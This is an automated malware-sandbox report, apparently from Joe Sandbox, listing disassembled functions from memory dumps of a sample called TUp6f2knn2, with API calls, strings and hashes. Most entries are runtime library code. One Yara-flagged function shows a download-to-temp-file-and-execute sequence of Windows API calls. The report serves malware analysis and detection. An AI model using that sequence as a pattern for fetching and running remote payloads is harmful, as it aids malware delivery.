Opcode Fuzzy Hash: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
Instruction Fuzzy Hash: BE317231600206AFEB606B38D848B76BBE5BF40764F214459E449E7650DF71E851CB6C

Function 0043A5F8 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 0043A63C

Part of subcall function 0043998B: _free.LIBCMT ref: 004399A8
Part of subcall function 0043998B: _free.LIBCMT ref: 004399BA
Part of subcall function 0043998B: _free.LIBCMT ref: 004399CC
Part of subcall function 0043998B: _free.LIBCMT ref: 004399DE
Part of subcall function 0043998B: _free.LIBCMT ref: 004399F0
Part of subcall function 0043998B: _free.LIBCMT ref: 00439A02
Part of subcall function 0043998B: _free.LIBCMT ref: 00439A14
Part of subcall function 0043998B: _free.LIBCMT ref: 00439A26
Part of subcall function 0043998B: _free.LIBCMT ref: 00439A38
Part of subcall function 0043998B: _free.LIBCMT ref: 00439A4A
Part of subcall function 0043998B: _free.LIBCMT ref: 00439A5C
Part of subcall function 0043998B: _free.LIBCMT ref: 00439A6E
Part of subcall function 0043998B: _free.LIBCMT ref: 00439A80

_free.LIBCMT ref: 0043A631

Part of subcall function 0043346A: HeapFree.KERNEL32(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492

_free.LIBCMT ref: 0043A653
_free.LIBCMT ref: 0043A668
_free.LIBCMT ref: 0043A673
_free.LIBCMT ref: 0043A695
_free.LIBCMT ref: 0043A6A8
_free.LIBCMT ref: 0043A6B6
_free.LIBCMT ref: 0043A6C1
_free.LIBCMT ref: 0043A6F9
_free.LIBCMT ref: 0043A700
_free.LIBCMT ref: 0043A71D
_free.LIBCMT ref: 0043A735

Memory Dump Source

Source File: 00000000.00000002.4130251057.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TUp6f2knn2.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
Instruction ID: f5f6d892b7e162680270ba0694072865b062da135816e678cf6525fe08cd79ed
Opcode Fuzzy Hash: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
Instruction Fuzzy Hash: E6318B716006009FEB21AF3AD846B5773E8FF18315F18A41FE499C6251DB39ED608B1A

Function 00439A89 Relevance: 18.4, APIs: 12, Instructions: 376COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00439AD1
_free.LIBCMT ref: 00439AF5
_free.LIBCMT ref: 00439B02
_free.LIBCMT ref: 00439B27
_free.LIBCMT ref: 00439B34
_free.LIBCMT ref: 00439B3D
_free.LIBCMT ref: 00439E1B
_free.LIBCMT ref: 00439E23

Memory Dump Source

Source File: 00000000.00000002.4130251057.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TUp6f2knn2.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 4cb414690be6fda0ca229090f7b6620efc7f825f0c5babe970a6a28c94bdcbad
Instruction ID: 5833a6d57b494697f4826b29985624930ca7ec9e215e7e0b09aa607084295bdd
Opcode Fuzzy Hash: 4cb414690be6fda0ca229090f7b6620efc7f825f0c5babe970a6a28c94bdcbad
Instruction Fuzzy Hash: 2CC15372E40205BBEB20DBA8CD43FEF77B8AB58704F15515AFA04FB282D6B49D418B54

Function 02532C5B Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 134filenetworksynchronizationCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(00451E78,00000000,00000000,00000000,00000000), ref: 02532C7E
InternetOpenUrlW.WININET(00000000,0045D820,00000000,00000000,00000000,00000000), ref: 02532C94
GetTempPathW.KERNEL32(00000105,?), ref: 02532CB0
GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 02532CC6
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 02532CFF
InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 02532D3B
WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 02532D58
ShellExecuteExW.SHELL32(?), ref: 02532DCF
WaitForSingleObject.KERNEL32(?,00008000), ref: 02532DE4

Strings

<, xrefs: 02532DAC

Memory Dump Source

Source File: 00000000.00000002.4130755786.0000000002530000.00000040.00001000.00020000.00000000.sdmp, Offset: 02530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2530000_TUp6f2knn2.jbxd

Yara matches

Similarity

API ID: File$Internet$OpenTemp$CreateExecuteNameObjectPathReadShellSingleWaitWrite
String ID: <
API String ID: 838076374-4251816714
Opcode ID: 6a1df9d8d931caabd250c55c7ad4b4351e218200b760aecaacf5835990ef0e97
Instruction ID: 9ba5297a1a20dce0e4de1cc913a397a80a06d9349494bbfba53218389afa3041
Opcode Fuzzy Hash: 6a1df9d8d931caabd250c55c7ad4b4351e218200b760aecaacf5835990ef0e97
Instruction Fuzzy Hash: FB414FB190061DAFEB219B60DC85FEA77BCFB05705F0080E6A548E2150DF709E868FA8

Function 0254EEC2 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 78libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(advapi32.dll,00000000,00000800,0045A064,00000000,?,?,00000000,00441C13,000000FF,?,0254F228,00000004,02547D87,00000004,02548069), ref: 0254EEF9
GetLastError.KERNEL32(?,0254F228,00000004,02547D87,00000004,02548069,?,02548799,?,00000008,0254800D,00000000,?,?,00000000,?), ref: 0254EF05
LoadLibraryW.KERNEL32(advapi32.dll,?,0254F228,00000004,02547D87,00000004,02548069,?,02548799,?,00000008,0254800D,00000000,?,?,00000000), ref: 0254EF15
GetProcAddress.KERNEL32(00000000,00447430), ref: 0254EF2B
GetProcAddress.KERNEL32(00000000,00000000), ref: 0254EF41
GetProcAddress.KERNEL32(00000000,00000000), ref: 0254EF58
GetProcAddress.KERNEL32(00000000,00000000), ref: 0254EF6F
GetProcAddress.KERNEL32(00000000,00000000), ref: 0254EF86
GetProcAddress.KERNEL32(00000000,00000000), ref: 0254EF9D

Strings

advapi32.dll, xrefs: 0254EEF3, 0254EEF8, 0254EF14

Memory Dump Source

Source File: 00000000.00000002.4130755786.0000000002530000.00000040.00001000.00020000.00000000.sdmp, Offset: 02530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2530000_TUp6f2knn2.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad$ErrorLast
String ID: advapi32.dll
API String ID: 2340687224-4050573280
Opcode ID: b1b79d5369405be0947094fd1898dbb8d0f25fa0b2a305c733e5edde1381297e
Instruction ID: d2ddf78ba341c873ae4559c5b858dc9dbc77f75b4b77f8285efdc0d337bcb765
Opcode Fuzzy Hash: b1b79d5369405be0947094fd1898dbb8d0f25fa0b2a305c733e5edde1381297e
Instruction Fuzzy Hash: BF2141B5904611BFE7106FB4DC09A5ABFA8FF05B1AF004A2AF955D3650CBBC94418FA8

Function 0254EEC5 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 77libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(advapi32.dll,00000000,00000800,0045A064,00000000,?,?,00000000,00441C13,000000FF,?,0254F228,00000004,02547D87,00000004,02548069), ref: 0254EEF9
GetLastError.KERNEL32(?,0254F228,00000004,02547D87,00000004,02548069,?,02548799,?,00000008,0254800D,00000000,?,?,00000000,?), ref: 0254EF05
LoadLibraryW.KERNEL32(advapi32.dll,?,0254F228,00000004,02547D87,00000004,02548069,?,02548799,?,00000008,0254800D,00000000,?,?,00000000), ref: 0254EF15
GetProcAddress.KERNEL32(00000000,00447430), ref: 0254EF2B
GetProcAddress.KERNEL32(00000000,00000000), ref: 0254EF41
GetProcAddress.KERNEL32(00000000,00000000), ref: 0254EF58
GetProcAddress.KERNEL32(00000000,00000000), ref: 0254EF6F
GetProcAddress.KERNEL32(00000000,00000000), ref: 0254EF86
GetProcAddress.KERNEL32(00000000,00000000), ref: 0254EF9D

Strings

advapi32.dll, xrefs: 0254EEF3, 0254EEF8, 0254EF14

Memory Dump Source

Source File: 00000000.00000002.4130755786.0000000002530000.00000040.00001000.00020000.00000000.sdmp, Offset: 02530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2530000_TUp6f2knn2.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad$ErrorLast
String ID: advapi32.dll
API String ID: 2340687224-4050573280
Opcode ID: 65d3570880ea5d838512f96381691d3386102deee3282de167715cc0b76a9286
Instruction ID: aafb4f7c21e007e962b29ba287df1bd5e5170ed8a3b72608dcc3ac486ca0ccbe
Opcode Fuzzy Hash: 65d3570880ea5d838512f96381691d3386102deee3282de167715cc0b76a9286
Instruction Fuzzy Hash: E4217FB1904711BBE7106F64DC09A5ABFACFB05B1AF004A2AF955D3600CBBC94418BAC

Function 025424A7 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 63libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000,00000000,?,?,?,0254670B), ref: 025424B6
GetProcAddress.KERNEL32(00000000,00446CDC), ref: 025424C4
GetProcAddress.KERNEL32(00000000,00446CF4), ref: 025424D2
GetModuleHandleW.KERNEL32(kernel32.dll,00446D0C,?,?,?,0254670B), ref: 02542500
GetProcAddress.KERNEL32(00000000), ref: 02542507
GetLastError.KERNEL32(?,?,?,0254670B), ref: 02542522
GetLastError.KERNEL32(?,?,?,0254670B), ref: 0254252E
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 02542544
__CxxThrowException@8.LIBVCRUNTIME ref: 02542552

Strings

kernel32.dll, xrefs: 025424B0, 025424B5, 025424FA

Memory Dump Source

Source File: 00000000.00000002.4130755786.0000000002530000.00000040.00001000.00020000.00000000.sdmp, Offset: 02530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2530000_TUp6f2knn2.jbxd

Yara matches

Similarity

API ID: AddressProc$ErrorHandleLastModule$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
String ID: kernel32.dll
API String ID: 4179531150-1793498882
Opcode ID: 1e04dd94cd55fca8ec38f5d852553bd0c5fa5d9a4266e3884da298c5c245e2aa
Instruction ID: 5428a0554b0b44e29f85a231c34a4db76d2eafe765051ea2bc410db007035dab
Opcode Fuzzy Hash: 1e04dd94cd55fca8ec38f5d852553bd0c5fa5d9a4266e3884da298c5c245e2aa
Instruction Fuzzy Hash: BF1106755003217FE7147B75AC58A6BBBACBD41B16B10052BBC01E2151EF78C9008E6C

Function 0042484D Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 104threadCOMMON

Download Yara Rule

APIs

Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 00424866

Part of subcall function 00424B35: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,00000000,00424599), ref: 00424B45

Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 0042487B
std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042488A
__CxxThrowException@8.LIBVCRUNTIME ref: 00424898
Concurrency::details::FreeVirtualProcessorRoot::Affinitize.LIBCONCRT ref: 0042490E
std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042494E
__CxxThrowException@8.LIBVCRUNTIME ref: 0042495C

Strings

pContext, xrefs: 00424946
switchState, xrefs: 00424882

Memory Dump Source

Source File: 00000000.00000002.4130251057.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TUp6f2knn2.jbxd

Similarity

API ID: Concurrency::details::$Exception@8FreeProcessorRoot::ThrowVirtualstd::invalid_argument::invalid_argument$AffinitizeExecutionIdleObjectProxy::ResetSingleSuspendThreadWait
String ID: pContext$switchState
API String ID: 3151764488-2660820399
Opcode ID: 219df9cbfeb1429f4312672cca97738a090813e365a6f1d89fd3b539392bd973
Instruction ID: 2510875a34d85c59997f50971944281e03e0fb8bb22fa9aac23d9a99742e70f3
Opcode Fuzzy Hash: 219df9cbfeb1429f4312672cca97738a090813e365a6f1d89fd3b539392bd973
Instruction Fuzzy Hash: 5F31F635B00224ABCF04EF65D881A6EB7B9FF84314F61456BE815A7381DB78EE05C798

Function 00419746 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 00419768
GetCurrentProcess.KERNEL32(000000FF,00000000), ref: 00419772
DuplicateHandle.KERNEL32(00000000), ref: 00419779
SafeRWList.LIBCONCRT ref: 00419798

Part of subcall function 00417767: Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00417778
Part of subcall function 00417767: List.LIBCMT ref: 00417782

std::invalid_argument::invalid_argument.LIBCONCRT ref: 004197AA
GetLastError.KERNEL32 ref: 004197B9
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004197CF
__CxxThrowException@8.LIBVCRUNTIME ref: 004197DD

Strings

eventObject, xrefs: 004197A2

Memory Dump Source

Source File: 00000000.00000002.4130251057.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TUp6f2knn2.jbxd

Similarity

API ID: CurrentListProcess$AcquireConcurrency::details::_Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorDuplicateErrorException@8HandleLastLock::_ReaderSafeThrowWriteWriterstd::invalid_argument::invalid_argument
String ID: eventObject
API String ID: 1999291547-1680012138
Opcode ID: a400a672ae4bfdaa01994e5aaa8cdae1f15ced21a90c909c370a8ff226bbabcd
Instruction ID: 481122be4c91591a449bb5dcd4d0178f9edd258f0a599c8a0e64e7baae7edbbd
Opcode Fuzzy Hash: a400a672ae4bfdaa01994e5aaa8cdae1f15ced21a90c909c370a8ff226bbabcd
Instruction Fuzzy Hash: 7A11A075500104EACB14EFA5CC49FEF77B8AF00701F24022BF519E21D1EB789A84C66D

Function 025453A5 Relevance: 15.2, APIs: 10, Instructions: 175COMMON

Download Yara Rule

APIs

Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 025454B0

Part of subcall function 02544EC1: Concurrency::details::platform::__GetLogicalProcessorInformationEx.LIBCONCRT ref: 02544ED5

Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 025454D9

Part of subcall function 0254333B: Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 02543357

Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 02545500
Concurrency::details::ResourceManager::CaptureProcessAffinity.LIBCONCRT ref: 025453BA

Part of subcall function 0254339F: __EH_prolog3_GS.LIBCMT ref: 025433A6
Part of subcall function 0254339F: GetCurrentProcess.KERNEL32(0045CB84,0045CB88,00000024), ref: 025433B5
Part of subcall function 0254339F: GetProcessAffinityMask.KERNEL32(00000000), ref: 025433BC
Part of subcall function 0254339F: GetCurrentThread.KERNEL32 ref: 025433E4
Part of subcall function 0254339F: Concurrency::details::HardwareAffinity::HardwareAffinity.LIBCMT ref: 025433EE

Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 025453DB
Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 02545412
Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 02545455
Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 02545548
Concurrency::details::ResourceManager::CaptureProcessAffinity.LIBCONCRT ref: 0254556C
Concurrency::details::ResourceManager::AffinityRestriction::FindGroupAffinity.LIBCONCRT ref: 02545579

Memory Dump Source

Source File: 00000000.00000002.4130755786.0000000002530000.00000040.00001000.00020000.00000000.sdmp, Offset: 02530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2530000_TUp6f2knn2.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$AffinityManager::Resource$ApplyRestrictions$InformationProcess$Topology$CaptureCurrentHardware$Affinity::CleanupConcurrency::details::platform::__FindGroupH_prolog3_LogicalMaskProcessorRestriction::Thread
String ID:
API String ID: 64082781-0
Opcode ID: 1ecb225e08598ee27c8c099d749289d9fb610fb0746485e2ea13aa543c18698c
Instruction ID: 1da07858071c807e740969b236a9d22c223e79312dfe2c743f198b197b6a2b19
Opcode Fuzzy Hash: 1ecb225e08598ee27c8c099d749289d9fb610fb0746485e2ea13aa543c18698c
Instruction Fuzzy Hash: DD616D719003119FDB18CF65E8D16ADFBB2FB9431AFA4807DD0469B252EB31A940CF48

Function 0041513E Relevance: 15.2, APIs: 10, Instructions: 175COMMON

Download Yara Rule

APIs

Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 00415249

Part of subcall function 00414C5A: Concurrency::details::platform::__GetLogicalProcessorInformationEx.LIBCONCRT ref: 00414C6E

Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 00415272

Part of subcall function 004130D4: Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 004130F0

Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 00415299
Concurrency::details::ResourceManager::CaptureProcessAffinity.LIBCONCRT ref: 00415153

Part of subcall function 00413138: __EH_prolog3_GS.LIBCMT ref: 0041313F
Part of subcall function 00413138: GetCurrentProcess.KERNEL32(0045CB84,0045CB88,00000024), ref: 0041314E
Part of subcall function 00413138: GetProcessAffinityMask.KERNEL32(00000000), ref: 00413155
Part of subcall function 00413138: GetCurrentThread.KERNEL32 ref: 0041317D
Part of subcall function 00413138: Concurrency::details::HardwareAffinity::HardwareAffinity.LIBCMT ref: 00413187

Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 00415174
Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 004151AB
Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 004151EE
Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 004152E1
Concurrency::details::ResourceManager::CaptureProcessAffinity.LIBCONCRT ref: 00415305
Concurrency::details::ResourceManager::AffinityRestriction::FindGroupAffinity.LIBCONCRT ref: 00415312

Memory Dump Source

Source File: 00000000.00000002.4130251057.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TUp6f2knn2.jbxd

Similarity

API ID: Concurrency::details::$AffinityManager::Resource$ApplyRestrictions$InformationProcess$Topology$CaptureCurrentHardware$Affinity::CleanupConcurrency::details::platform::__FindGroupH_prolog3_LogicalMaskProcessorRestriction::Thread
String ID:
API String ID: 64082781-0
Opcode ID: 1ecb225e08598ee27c8c099d749289d9fb610fb0746485e2ea13aa543c18698c
Instruction ID: 68d129af9073e170e0bd2ed5c1ca810268e1faaa5ea0560f3945f8c62b51e45f
Opcode Fuzzy Hash: 1ecb225e08598ee27c8c099d749289d9fb610fb0746485e2ea13aa543c18698c
Instruction Fuzzy Hash: 8B619B72A00715DFDB18CFA5E8D26EEB7B1FB84316F24806ED45697242D738A981CF48

Function 02550C26 Relevance: 15.1, APIs: 10, Instructions: 136threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 02550C36
Concurrency::details::UMS::CreateUmsCompletionList.LIBCONCRT ref: 02550C9D
Concurrency::details::InternalContextBase::ExecutedAssociatedChore.LIBCONCRT ref: 02550CBA
Concurrency::details::InternalContextBase::WorkWasFound.LIBCONCRT ref: 02550D20
Concurrency::details::InternalContextBase::ExecuteChoreInline.LIBCMT ref: 02550D35
Concurrency::details::InternalContextBase::WaitForWork.LIBCONCRT ref: 02550D47
Concurrency::details::InternalContextBase::SwitchTo.LIBCONCRT ref: 02550D75
Concurrency::details::UMS::GetCurrentUmsThread.LIBCONCRT ref: 02550D80
__CxxThrowException@8.LIBVCRUNTIME ref: 02550DAC
Concurrency::details::WorkItem::TransferReferences.LIBCONCRT ref: 02550DBC

Memory Dump Source

Source File: 00000000.00000002.4130755786.0000000002530000.00000040.00001000.00020000.00000000.sdmp, Offset: 02530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2530000_TUp6f2knn2.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Base::ContextInternal$Work$ChoreCurrentThread$AssociatedCompletionCreateException@8ExecuteExecutedFoundInlineItem::ListReferencesSwitchThrowTransferWait
String ID:
API String ID: 3720063390-0
Opcode ID: 771ecb464f7cbbc53463eb78e9650550d29affee346428328e6f851ddce87dca
Instruction ID: 81c0af5fa1f71833bb1537430c4091c3595774f666f0411e2f82ab4b28ac6ca1
Opcode Fuzzy Hash: 771ecb464f7cbbc53463eb78e9650550d29affee346428328e6f851ddce87dca
Instruction Fuzzy Hash: BA41C430A0426A9ACF15FBA4C4647BDBB66BF86308F04406ADC065B2C2DF359A05CB6D

Function 0256204D Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 02562061

Part of subcall function 025636D1: HeapFree.KERNEL32(00000000,00000000,?,0256A35F,?,00000000,?,00000000,?,0256A603,?,00000007,?,?,0256A9F7,?), ref: 025636E7
Part of subcall function 025636D1: GetLastError.KERNEL32(?,?,0256A35F,?,00000000,?,00000000,?,0256A603,?,00000007,?,?,0256A9F7,?,?), ref: 025636F9

_free.LIBCMT ref: 0256206D
_free.LIBCMT ref: 02562078
_free.LIBCMT ref: 02562083
_free.LIBCMT ref: 0256208E
_free.LIBCMT ref: 02562099
_free.LIBCMT ref: 025620A4
_free.LIBCMT ref: 025620AF
_free.LIBCMT ref: 025620BA
_free.LIBCMT ref: 025620C8

Memory Dump Source

Source File: 00000000.00000002.4130755786.0000000002530000.00000040.00001000.00020000.00000000.sdmp, Offset: 02530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2530000_TUp6f2knn2.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
Instruction ID: c0cb8ef1bef047b1fd3412bc8301e55ac3e185308de2de88769d2a639aead9a8
Opcode Fuzzy Hash: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
Instruction Fuzzy Hash: 3C117276600119BFCB41EF94C845CE97BA6FF44750B5180A5BA088F221DB71EEA09F94

Function 00431DE6 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00431DFA

Part of subcall function 0043346A: HeapFree.KERNEL32(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492

_free.LIBCMT ref: 00431E06
_free.LIBCMT ref: 00431E11
_free.LIBCMT ref: 00431E1C
_free.LIBCMT ref: 00431E27
_free.LIBCMT ref: 00431E32
_free.LIBCMT ref: 00431E3D
_free.LIBCMT ref: 00431E48
_free.LIBCMT ref: 00431E53
_free.LIBCMT ref: 00431E61

Memory Dump Source

Source File: 00000000.00000002.4130251057.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TUp6f2knn2.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
Instruction ID: 861173ad91a1010c78510ab484a24ed9c78665ad215b99cbbf48ba7f2ea438f1
Opcode Fuzzy Hash: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
Instruction Fuzzy Hash: 5811B9B6600508BFDB02EF5AC852CD93BA5EF18755F0190AAF9084F232D635DF559F84

Function 0042E1B2 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 200COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftoe.LIBCMT ref: 0042E1DE
__cftoe.LIBCMT ref: 0042E210

Strings

F(@, xrefs: 0042E25E, 0042E1CC, 0042E261
F(@, xrefs: 0042E229, 0042E1C0

Memory Dump Source

Source File: 00000000.00000002.4130251057.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TUp6f2knn2.jbxd

Similarity

API ID: __cftoe
String ID: F(@$F(@
API String ID: 4189289331-2038261262
Opcode ID: bbe416c8d69575f9d93ce627a81c40a4a4bf106591ac0e44be9dd0909605bb26
Instruction ID: f7128e803ecc638eadc91937d15ccb8599414b14ec088efe1e3a9152a03639fe
Opcode Fuzzy Hash: bbe416c8d69575f9d93ce627a81c40a4a4bf106591ac0e44be9dd0909605bb26
Instruction Fuzzy Hash: 35511A32600215EBEB209F5BAC41FAF77A9EF49324F94425FF81592282DB39D900866D

Function 0043EEA2 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMONLIBRARYCODE

Download Yara Rule

APIs

DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,0044018F), ref: 0043EEC5

Strings

acos, xrefs: 0043F03D
asin, xrefs: 0043F031
exp, xrefs: 0043EF8A, 0043EFEC
pow, xrefs: 0043EFA9, 0043F055, 0043F068
log, xrefs: 0043EF6B, 0043EF77
log10, xrefs: 0043EF0F, 0043EF5F
sqrt, xrefs: 0043F049

Memory Dump Source

Source File: 00000000.00000002.4130251057.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TUp6f2knn2.jbxd

Similarity

API ID: DecodePointer
String ID: acos$asin$exp$log$log10$pow$sqrt
API String ID: 3527080286-3064271455
Opcode ID: aa1c02400c42ddcfd268636a8d8394cc3decb473de125785aaadf9f4f02fbad0
Instruction ID: 8170d9845b751ca2959588a2f937d780391b5e174033125a046a2bd7c9c475e6
Opcode Fuzzy Hash: aa1c02400c42ddcfd268636a8d8394cc3decb473de125785aaadf9f4f02fbad0
Instruction Fuzzy Hash: 3351AF7090050EDBDF14DF99E6481ADBBB0FB4D300F2551A7E480A7295C77A8D29CB1E

Function 02563190 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4130755786.0000000002530000.00000040.00001000.00020000.00000000.sdmp, Offset: 02530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2530000_TUp6f2knn2.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2096f585af2949bbcbeb02ba378e27ab7de49007c7775bea8d51a9bce3371cac
Instruction ID: c595df054a030bc23ce5fa79794f9119a1b196d05cf0a7b1bb52b04d171d8851
Opcode Fuzzy Hash: 2096f585af2949bbcbeb02ba378e27ab7de49007c7775bea8d51a9bce3371cac
Instruction Fuzzy Hash: 26C1D170E0424ABFDB11DFA8C849BBEBFB1BF4A715F084199E814A7391D7309941CB69

Function 004286D0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 004286FB
___except_validate_context_record.LIBVCRUNTIME ref: 00428703
_ValidateLocalCookies.LIBCMT ref: 00428791
__IsNonwritableInCurrentImage.LIBCMT ref: 004287BC
_ValidateLocalCookies.LIBCMT ref: 00428811

Strings

csm, xrefs: 004287A6
fB, xrefs: 004287AE, 004287B7, 004287C8

Memory Dump Source

Source File: 00000000.00000002.4130251057.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TUp6f2knn2.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: fB$csm
API String ID: 1170836740-1586063737
Opcode ID: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
Instruction ID: 7444ce20eee9e01817f939fbe5b18052b9a848ec9e24e3aae95877e68e098c30
Opcode Fuzzy Hash: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
Instruction Fuzzy Hash: F241FB34F012289BCF10DF19DC41A9EBBB5AF84318F64816FE9145B392DB399D11CB99

Function 0254C6C0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 45COMMONLIBRARYCODE

Download Yara Rule

APIs

atomic_compare_exchange.LIBCONCRT ref: 0254C6DC
atomic_compare_exchange.LIBCONCRT ref: 0254C700
std::_Cnd_initX.LIBCPMT ref: 0254C711
std::_Cnd_initX.LIBCPMT ref: 0254C71F

